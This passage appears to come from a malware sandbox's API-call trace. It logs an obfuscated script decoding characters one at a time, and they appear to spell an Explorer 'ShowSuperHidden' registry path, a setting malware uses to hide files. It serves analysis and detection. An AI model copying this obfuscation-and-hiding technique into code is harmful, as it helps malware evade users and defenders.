returned 0x0 [0167.900] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="p", cbMultiByte=1, lpWideCharStr=0x1150de4, cchWideChar=1 | out: lpWideCharStr="p") returned 1 [0167.900] VarCat (in: pvarLeft=0x28f880, pvarRight=0x28f950, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.900] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="y", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="y\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0167.900] VarSub (in: pvarLeft=0x28fa10, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.901] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="l", cbMultiByte=1, lpWideCharStr=0x1167dbc, cchWideChar=1 | out: lpWideCharStr="l") returned 1 [0167.901] VarCat (in: pvarLeft=0x28f880, pvarRight=0x28f950, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.901] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="|", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="|\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0167.901] VarSub (in: pvarLeft=0x28fa10, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.901] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="o", cbMultiByte=1, lpWideCharStr=0x1150de4, cchWideChar=1 | out: lpWideCharStr="o") returned 1 [0167.901] VarCat (in: pvarLeft=0x28f880, pvarRight=0x28f950, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.902] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x7f", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x7f\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0167.902] VarSub (in: pvarLeft=0x28fa10, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.902] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="r", cbMultiByte=1, lpWideCharStr=0x1167dbc, cchWideChar=1 | out: lpWideCharStr="r") returned 1 [0167.902] VarCat (in: pvarLeft=0x28f880, pvarRight=0x28f950, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.000] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="r", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="r\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0168.001] VarSub (in: pvarLeft=0x28fa10, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.001] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="e", cbMultiByte=1, lpWideCharStr=0x1150de4, cchWideChar=1 | out: lpWideCharStr="e") returned 1 [0168.001] VarCat (in: pvarLeft=0x28f880, pvarRight=0x28f950, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.001] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x7f", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x7f\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0168.001] VarSub (in: pvarLeft=0x28fa10, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.002] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="r", cbMultiByte=1, lpWideCharStr=0x1167dbc, cchWideChar=1 | out: lpWideCharStr="r") returned 1 [0168.002] VarCat (in: pvarLeft=0x28f880, pvarRight=0x28f950, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.002] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="i", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="i\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0168.002] VarSub (in: pvarLeft=0x28fa10, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.002] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="\\", cbMultiByte=1, lpWideCharStr=0x1150de4, cchWideChar=1 | out: lpWideCharStr="\\") returned 1 [0168.002] VarCat (in: pvarLeft=0x28f880, pvarRight=0x28f950, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.003] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="N", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0168.003] VarSub (in: pvarLeft=0x28fa10, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.003] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="A", cbMultiByte=1, lpWideCharStr=0x1167dbc, cchWideChar=1 | out: lpWideCharStr="A") returned 1 [0168.003] VarCat (in: pvarLeft=0x28f880, pvarRight=0x28f950, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.004] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="q", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="q\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0168.004] VarSub (in: pvarLeft=0x28fa10, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.004] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="d", cbMultiByte=1, lpWideCharStr=0x1150de4, cchWideChar=1 | out: lpWideCharStr="d") returned 1 [0168.004] VarCat (in: pvarLeft=0x28f880, pvarRight=0x28f950, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.004] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ƒ", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x83\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0168.005] VarSub (in: pvarLeft=0x28fa10, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.005] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="v", cbMultiByte=1, lpWideCharStr=0x1167dbc, cchWideChar=1 | out: lpWideCharStr="v") returned 1 [0168.005] VarCat (in: pvarLeft=0x28f880, pvarRight=0x28f950, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.005] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="n", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="n\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0168.005] VarSub (in: pvarLeft=0x28fa10, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.006] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="a", cbMultiByte=1, lpWideCharStr=0x1150de4, cchWideChar=1 | out: lpWideCharStr="a") returned 1 [0168.006] VarCat (in: pvarLeft=0x28f880, pvarRight=0x28f950, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.006] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="{", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0168.006] VarSub (in: pvarLeft=0x28fa10, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.006] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="n", cbMultiByte=1, lpWideCharStr=0x1167dbc, cchWideChar=1 | out: lpWideCharStr="n") returned 1 [0168.007] VarCat (in: pvarLeft=0x28f880, pvarRight=0x28f950, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.007] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="p", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="p\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0168.007] VarSub (in: pvarLeft=0x28fa10, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.007] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="c", cbMultiByte=1, lpWideCharStr=0x1150de4, cchWideChar=1 | out: lpWideCharStr="c") returned 1 [0168.007] VarCat (in: pvarLeft=0x28f880, pvarRight=0x28f950, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.008] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="r", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="r\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0168.008] VarSub (in: pvarLeft=0x28fa10, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.008] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="e", cbMultiByte=1, lpWideCharStr=0x1167dbc, cchWideChar=1 | out: lpWideCharStr="e") returned 1 [0168.008] VarCat (in: pvarLeft=0x28f880, pvarRight=0x28f950, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.009] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="q", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="q\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0168.009] VarSub (in: pvarLeft=0x28fa10, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.009] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="d", cbMultiByte=1, lpWideCharStr=0x1150de4, cchWideChar=1 | out: lpWideCharStr="d") returned 1 [0168.009] VarCat (in: pvarLeft=0x28f880, pvarRight=0x28f950, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.010] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="i", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="i\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0168.010] VarSub (in: pvarLeft=0x28fa10, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.010] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="\\", cbMultiByte=1, lpWideCharStr=0x1167dbc, cchWideChar=1 | out: lpWideCharStr="\\") returned 1 [0168.010] VarCat (in: pvarLeft=0x28f880, pvarRight=0x28f950, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.010] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="`", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="`\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0168.011] VarSub (in: pvarLeft=0x28fa10, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.011] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="S", cbMultiByte=1, lpWideCharStr=0x1150de4, cchWideChar=1 | out: lpWideCharStr="S") returned 1 [0168.011] VarCat (in: pvarLeft=0x28f880, pvarRight=0x28f950, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.011] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="u", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="u\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0168.011] VarSub (in: pvarLeft=0x28fa10, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.012] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="h", cbMultiByte=1, lpWideCharStr=0x1167dbc, cchWideChar=1 | out: lpWideCharStr="h") returned 1 [0168.012] VarCat (in: pvarLeft=0x28f880, pvarRight=0x28f950, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.016] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="|", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="|\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0168.016] VarSub (in: pvarLeft=0x28fa10, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.016] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="o", cbMultiByte=1, lpWideCharStr=0x1150de4, cchWideChar=1 | out: lpWideCharStr="o") returned 1 [0168.016] VarCat (in: pvarLeft=0x28f880, pvarRight=0x28f950, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.017] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="„", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x84\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0168.017] VarSub (in: pvarLeft=0x28fa10, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.017] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="w", cbMultiByte=1, lpWideCharStr=0x1167dbc, cchWideChar=1 | out: lpWideCharStr="w") returned 1 [0168.017] VarCat (in: pvarLeft=0x28f880, pvarRight=0x28f950, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.018] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="`", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="`\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0168.018] VarSub (in: pvarLeft=0x28fa10, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.018] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="S", cbMultiByte=1, lpWideCharStr=0x1150de4, cchWideChar=1 | out: lpWideCharStr="S") returned 1 [0168.018] VarCat (in: pvarLeft=0x28f880, pvarRight=0x28f950, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.019] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="‚", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x82\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0168.019] VarSub (in: pvarLeft=0x28fa10, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.019] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="u", cbMultiByte=1, lpWideCharStr=0x1167dbc, cchWideChar=1 | out: lpWideCharStr="u") returned 1 [0168.019] VarCat (in: pvarLeft=0x28f880, pvarRight=0x28f950, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.020] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="}", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="}\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0168.020] VarSub (in: pvarLeft=0x28fa10, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.020] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="p", cbMultiByte=1, lpWideCharStr=0x1150de4, cchWideChar=1 | out: lpWideCharStr="p") returned 1 [0168.020] VarCat (in: pvarLeft=0x28f880, pvarRight=0x28f950, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.020] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="r", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="r\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0168.021] VarSub (in: pvarLeft=0x28fa10, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.021] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="e", cbMultiByte=1, lpWideCharStr=0x1167dbc, cchWideChar=1 | out: lpWideCharStr="e") returned 1 [0168.021] VarCat (in: pvarLeft=0x28f880, pvarRight=0x28f950, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.021] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x7f", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x7f\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0168.022] VarSub (in: pvarLeft=0x28fa10, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.022] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="r", cbMultiByte=1, lpWideCharStr=0x1150de4, cchWideChar=1 | out: lpWideCharStr="r") returned 1 [0168.022] VarCat (in: pvarLeft=0x28f880, pvarRight=0x28f950, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.022] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="U", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="U\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0168.022] VarSub (in: pvarLeft=0x28fa10, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.023] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="H", cbMultiByte=1, lpWideCharStr=0x1167dbc, cchWideChar=1 | out: lpWideCharStr="H") returned 1 [0168.023] VarCat (in: pvarLeft=0x28f880, pvarRight=0x28f950, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.023] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="v", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="v\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0168.023] VarSub (in: pvarLeft=0x28fa10, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.024] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="i", cbMultiByte=1, lpWideCharStr=0x1150de4, cchWideChar=1 | out: lpWideCharStr="i") returned 1 [0168.024] VarCat (in: pvarLeft=0x28f880, pvarRight=0x28f950, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.024] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="q", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="q\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0168.024] VarSub (in: pvarLeft=0x28fa10, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.024] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="d", cbMultiByte=1, lpWideCharStr=0x1167dbc, cchWideChar=1 | out: lpWideCharStr="d") returned 1 [0168.024] VarCat (in: pvarLeft=0x28f880, pvarRight=0x28f950, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.025] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="q", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="q\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0168.025] VarSub (in: pvarLeft=0x28fa10, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.025] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="d", cbMultiByte=1, lpWideCharStr=0x1150de4, cchWideChar=1 | out: lpWideCharStr="d") returned 1 [0168.025] VarCat (in: pvarLeft=0x28f880, pvarRight=0x28f950, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.026] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="r", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="r\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0168.026] VarSub (in: pvarLeft=0x28fa10, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.026] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="e", cbMultiByte=1, lpWideCharStr=0x1167dbc, cchWideChar=1 | out: lpWideCharStr="e") returned 1 [0168.026] VarCat (in: pvarLeft=0x28f880, pvarRight=0x28f950, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.026] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="{", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0168.027] VarSub (in: pvarLeft=0x28fa10, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.027] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="n", cbMultiByte=1, lpWideCharStr=0x1150de4, cchWideChar=1 | out: lpWideCharStr="n") returned 1 [0168.027] VarCat (in: pvarLeft=0x28f880, pvarRight=0x28f950, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.031] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="U", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="U\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0168.031] VarSub (in: pvarLeft=0x28fa20, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.031] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="H", cbMultiByte=1, lpWideCharStr=0x1167dbc, cchWideChar=1 | out: lpWideCharStr="H") returned 1 [0168.031] VarCat (in: pvarLeft=0x28f8e0, pvarRight=0x28f960, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.031] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="X", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="X\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0168.031] VarSub (in: pvarLeft=0x28fa20, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.031] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="K", cbMultiByte=1, lpWideCharStr=0x11596d4, cchWideChar=1 | out: lpWideCharStr="K") returned 1 [0168.032] VarCat (in: pvarLeft=0x28f8e0, pvarRight=0x28f960, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.032] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="R", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="R\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0168.032] VarSub (in: pvarLeft=0x28fa20, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.032] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="E", cbMultiByte=1, lpWideCharStr=0x11683e4, cchWideChar=1 | out: lpWideCharStr="E") returned 1 [0168.032] VarCat (in: pvarLeft=0x28f8e0, pvarRight=0x28f960, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.033] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="f", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="f\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0168.033] VarSub (in: pvarLeft=0x28fa20, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.033] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Y", cbMultiByte=1, lpWideCharStr=0x1167dbc, cchWideChar=1 | out: lpWideCharStr="Y") returned 1 [0168.033] VarCat (in: pvarLeft=0x28f8e0, pvarRight=0x28f960, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.034] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="l", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="l\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0168.034] VarSub (in: pvarLeft=0x28fa20, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.034] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="_", cbMultiByte=1, lpWideCharStr=0x11596d4, cchWideChar=1 | out: lpWideCharStr="_") returned 1 [0168.034] VarCat (in: pvarLeft=0x28f8e0, pvarRight=0x28f960, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.034] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Y", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Y\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0168.035] VarSub (in: pvarLeft=0x28fa20, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.035] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="L", cbMultiByte=1, lpWideCharStr=0x11683e4, cchWideChar=1 | out: lpWideCharStr="L") returned 1 [0168.035] VarCat (in: pvarLeft=0x28f8e0, pvarRight=0x28f960, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.035] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\\", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: 